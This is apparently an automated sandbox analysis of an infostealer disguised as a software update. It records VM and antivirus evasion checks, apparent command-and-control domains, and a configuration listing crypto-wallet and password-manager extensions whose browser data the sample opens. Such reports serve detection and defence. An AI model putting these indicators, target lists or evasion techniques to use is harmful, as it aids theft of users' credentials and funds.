                  Source: NewI Upd v1.1.0.exe, 00000000.00000000.1662038750.00000000008C3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRmCfer.exe@ vs NewI Upd v1.1.0.exe
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.2986275551.00000000046EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRmCfer.exe@ vs NewI Upd v1.1.0.exe
                  Source: NewI Upd v1.1.0.exeBinary or memory string: OriginalFilenameRmCfer.exe@ vs NewI Upd v1.1.0.exe
                  Source: NewI Upd v1.1.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004388C0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_004388C0
                  Source: NewI Upd v1.1.0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3035156183.00000000088C9000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035555761.0000000008895000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: NewI Upd v1.1.0.exeReversingLabs: Detection: 42%
                  Source: NewI Upd v1.1.0.exeVirustotal: Detection: 34%
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile read: C:\Users\user\Desktop\NewI Upd v1.1.0.exeJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: NewI Upd v1.1.0.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: NewI Upd v1.1.0.exeStatic file information: File size 2757632 > 1048576
                  Source: NewI Upd v1.1.0.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x27d200
                  Source: NewI Upd v1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: NewI Upd v1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: NewI Upd v1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: NewI Upd v1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: NewI Upd v1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: NewI Upd v1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: NewI Upd v1.1.0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: NewI Upd v1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Admin\Workspace\465053702\Project\Release\Project.pdb source: NewI Upd v1.1.0.exe
                  Source: NewI Upd v1.1.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: NewI Upd v1.1.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: NewI Upd v1.1.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: NewI Upd v1.1.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: NewI Upd v1.1.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: NewI Upd v1.1.0.exeStatic PE information: section name: .fptable
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043E970 push eax; mov dword ptr [esp], CCCFCE81h0_2_0043E971
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043BEB0 push eax; mov dword ptr [esp], 74757677h0_2_0043BEBE
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe TID: 4432Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe TID: 4432Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00896350 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,0_2_00896350
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00886940 GetSystemInfo,0_2_00886940
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178938792.0000000001911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmNetwo
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018DC000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018DC000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178938792.0000000001911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043D440 LdrInitializeThunk,0_2_0043D440
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0087D950 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0087D950
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_008C08B8 mov eax, dword ptr fs:[00000030h]0_2_008C08B8
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_008BFC78 mov eax, dword ptr fs:[00000030h]0_2_008BFC78
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0089B300 GetProcessHeap,0_2_0089B300
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0087D020 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0087D020
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0087D950 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0087D950
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0087DB70 SetUnhandledExceptionFilter,0_2_0087DB70
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00888EB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00888EB0

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: begguinnerz.biz
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00437FB0 cpuid 0_2_00437FB0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0087D720 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0087D720
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179859088.000000000196E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000196E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3157470323.000000000196B000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178798124.000000000196E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: NewI Upd v1.1.0.exe PID: 6648, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.NewI Upd v1.1.0.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3179555778.00000000017B0000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179859088.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"v":4,"se":false,"ad":false,"vm":false,"ex":[{"en":"ejbalbakoplchlghecdalmeeeajnimhm","ez":"MetaMask"},{"en":"aeblfdkhhhdcdjpifhhbdiojplfjncoa","ez":"1Password"},{"en":"jnlgamecbpmbajjfhmmmlhejkemejdma","ez":"Braavos"},{"en":"dlcobpjiigpikoobohmabehhmhfoodbb","ez":"Agrent X"},{"en":"jgaaimajipbpdogpdglhaphldakikgef","ez":"Coinhub"},{"en":"fcfcfllfndlomdhbehjjcoimbgofdncg","ez":"Leap Wallet"},{"en":"lgmpcpglpngdoalbgeoldeajfclnhafa","ez":"Safepal"},{"en":"hdokiejnpimakedhajhdlcegeplioahd","ez":"LastPass"},{"en":"kjmoohlgokccodicjjfebfomlbljgfhk","ez":"Ronin Wallet"},{"en":"pioclpoplcdbaefihamjohnefbikjilc","ez":"Evernote"},{"en":"dngmlblcodfobpdpecaadgfbcggfjfnm","ez":"MultiversX Wallet"},{"en":"kppfdiipphfccemcignhifpjkapfbihd","ez":"ForniterWallet"},{"en":"mmmjbcfofconkannjonfmjjajpllddbg","ez":"Fluvi Wallet"},{"en":"loinekcabhlmhjjbocijdoimmejangoa","ez":"Glass Wallet"},{"en":"heefohaffomkkkphnlpohglngmbcclhi","ez":"Morphis Wallet"},{"en":"idnnbdplmphpflfnlkomgpfbpcgelopg","ez":"XVerse Wallet"},{"en":"anokgmphncpekkhclmingpimjmcooifb","ez":"Compas Wallet"},{"en":"cnncmdhjacpkmjmkcafchppbnpnhdmon","ez":"Havah Wallet"},{"en":"ocjdpmoallmgmjbbogfiiaofphbjgchh","ez":"Sui Wallet"},{"en":"ojggmchlghnjlapmfbnjholfjkiidbch","ez":"Venom Wallet"},{"en":"nkbihfbeogaeaoehlefnkodbefgpgknn","ez":"MetaMask"},{"en":"egjidjbpglichdcondbcbdnbeeppgdph","ez":"Trust Wallet"},{"en":"ibnejdfjmmkpcnlpebklmnkoeoihofec","ez":"TronLink"},{"en":"fnjhmkhhmkbjkkabndcnnogagogbneec","ez":"Ronin Wallet"},{"en":"mcohilncbfahbmgdjkbpemcciiolgcge","ez":"OKX"},{"en":"fhbohimaelbohpjbbldcngcnapndodjp","ez":"Binance Chain Wallet"},{"en":"ffnbelfdoeiohenkjibnmadjiehjhajb","ez":"Yoroi"},{"en":"jbdaocneiiinmjbjlgalhcelgbejmnid","ez":"Nifty"},{"en":"afbcbjpbpfadlkmhmclhkeeodmamcflc","ez":"Math"},{"en":"hnfanknocfeofbddgcijnmhnfnkdnaad","ez":"Coinbase","ldb":true},{"en":"hpglfhgfnhbgpjdenjgmdgoeiappafln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdigobghenbbaddojjnnaogfppfj","ez":"iWlt"},{"en":"kkpllkodjeloidieedojogacfhpaihoh","ez":"EnKrypt"},{"en":"amkmjjmmflddogmhpjloimipbofnfjih","ez":"Wombat"},{"en":"nlbmnnijcnlegkjjpcfjclmcfggfefdm","ez":"MEW CX"},{"en":"nanjmdknhkinifnkgdcggcfnhdaammmj","ez":"Guild"},{"en":"nkddgncdjgjfcddamfgcmfnlhccnimig","ez":"Saturn"},{"en":"cphhlgmgameodnhkjdmkpanlelnlohao","ez":"NeoLine"},{"en":"nhnkbkgjikgcigadomkphalanndcapjk","ez":"Clover"},{"en":"acmacodkjbdgmoleebolmdjonilkdbch","ez":"Rabby"},{"en":"phkbamefinggmakgklpkljjmgibohnba","ez":"Pontem"},{"en":"efbglgofoippbgcjepnhiblaibcnclgk","ez":"Martian"},{"en":"nngceckbapebfimnlniiiahkandclblb","ez":"Bitwarden"},{"en":"lpfcbjknijpeeillifnkikgncikgfhdo","ez":"Nami"},{"en":"ejjladinnckdgjemekebdpeokbikhfci","ez":"Petra"},{"en":"opcgpfmipidbgpenhmajoajpbobppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfo
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179859088.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"v":4,"se":false,"ad":false,"vm":false,"ex":[{"en":"ejbalbakoplchlghecdalmeeeajnimhm","ez":"MetaMask"},{"en":"aeblfdkhhhdcdjpifhhbdiojplfjncoa","ez":"1Password"},{"en":"jnlgamecbpmbajjfhmmmlhejkemejdma","ez":"Braavos"},{"en":"dlcobpjiigpikoobohmabehhmhfoodbb","ez":"Agrent X"},{"en":"jgaaimajipbpdogpdglhaphldakikgef","ez":"Coinhub"},{"en":"fcfcfllfndlomdhbehjjcoimbgofdncg","ez":"Leap Wallet"},{"en":"lgmpcpglpngdoalbgeoldeajfclnhafa","ez":"Safepal"},{"en":"hdokiejnpimakedhajhdlcegeplioahd","ez":"LastPass"},{"en":"kjmoohlgokccodicjjfebfomlbljgfhk","ez":"Ronin Wallet"},{"en":"pioclpoplcdbaefihamjohnefbikjilc","ez":"Evernote"},{"en":"dngmlblcodfobpdpecaadgfbcggfjfnm","ez":"MultiversX Wallet"},{"en":"kppfdiipphfccemcignhifpjkapfbihd","ez":"ForniterWallet"},{"en":"mmmjbcfofconkannjonfmjjajpllddbg","ez":"Fluvi Wallet"},{"en":"loinekcabhlmhjjbocijdoimmejangoa","ez":"Glass Wallet"},{"en":"heefohaffomkkkphnlpohglngmbcclhi","ez":"Morphis Wallet"},{"en":"idnnbdplmphpflfnlkomgpfbpcgelopg","ez":"XVerse Wallet"},{"en":"anokgmphncpekkhclmingpimjmcooifb","ez":"Compas Wallet"},{"en":"cnncmdhjacpkmjmkcafchppbnpnhdmon","ez":"Havah Wallet"},{"en":"ocjdpmoallmgmjbbogfiiaofphbjgchh","ez":"Sui Wallet"},{"en":"ojggmchlghnjlapmfbnjholfjkiidbch","ez":"Venom Wallet"},{"en":"nkbihfbeogaeaoehlefnkodbefgpgknn","ez":"MetaMask"},{"en":"egjidjbpglichdcondbcbdnbeeppgdph","ez":"Trust Wallet"},{"en":"ibnejdfjmmkpcnlpebklmnkoeoihofec","ez":"TronLink"},{"en":"fnjhmkhhmkbjkkabndcnnogagogbneec","ez":"Ronin Wallet"},{"en":"mcohilncbfahbmgdjkbpemcciiolgcge","ez":"OKX"},{"en":"fhbohimaelbohpjbbldcngcnapndodjp","ez":"Binance Chain Wallet"},{"en":"ffnbelfdoeiohenkjibnmadjiehjhajb","ez":"Yoroi"},{"en":"jbdaocneiiinmjbjlgalhcelgbejmnid","ez":"Nifty"},{"en":"afbcbjpbpfadlkmhmclhkeeodmamcflc","ez":"Math"},{"en":"hnfanknocfeofbddgcijnmhnfnkdnaad","ez":"Coinbase","ldb":true},{"en":"hpglfhgfnhbgpjdenjgmdgoeiappafln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdigobghenbbaddojjnnaogfppfj","ez":"iWlt"},{"en":"kkpllkodjeloidieedojogacfhpaihoh","ez":"EnKrypt"},{"en":"amkmjjmmflddogmhpjloimipbofnfjih","ez":"Wombat"},{"en":"nlbmnnijcnlegkjjpcfjclmcfggfefdm","ez":"MEW CX"},{"en":"nanjmdknhkinifnkgdcggcfnhdaammmj","ez":"Guild"},{"en":"nkddgncdjgjfcddamfgcmfnlhccnimig","ez":"Saturn"},{"en":"cphhlgmgameodnhkjdmkpanlelnlohao","ez":"NeoLine"},{"en":"nhnkbkgjikgcigadomkphalanndcapjk","ez":"Clover"},{"en":"acmacodkjbdgmoleebolmdjonilkdbch","ez":"Rabby"},{"en":"phkbamefinggmakgklpkljjmgibohnba","ez":"Pontem"},{"en":"efbglgofoippbgcjepnhiblaibcnclgk","ez":"Martian"},{"en":"nngceckbapebfimnlniiiahkandclblb","ez":"Bitwarden"},{"en":"lpfcbjknijpeeillifnkikgncikgfhdo","ez":"Nami"},{"en":"ejjladinnckdgjemekebdpeokbikhfci","ez":"Petra"},{"en":"opcgpfmipidbgpenhmajoajpbobppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfo
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3109623142.000000000196B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3109663115.0000000001973000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
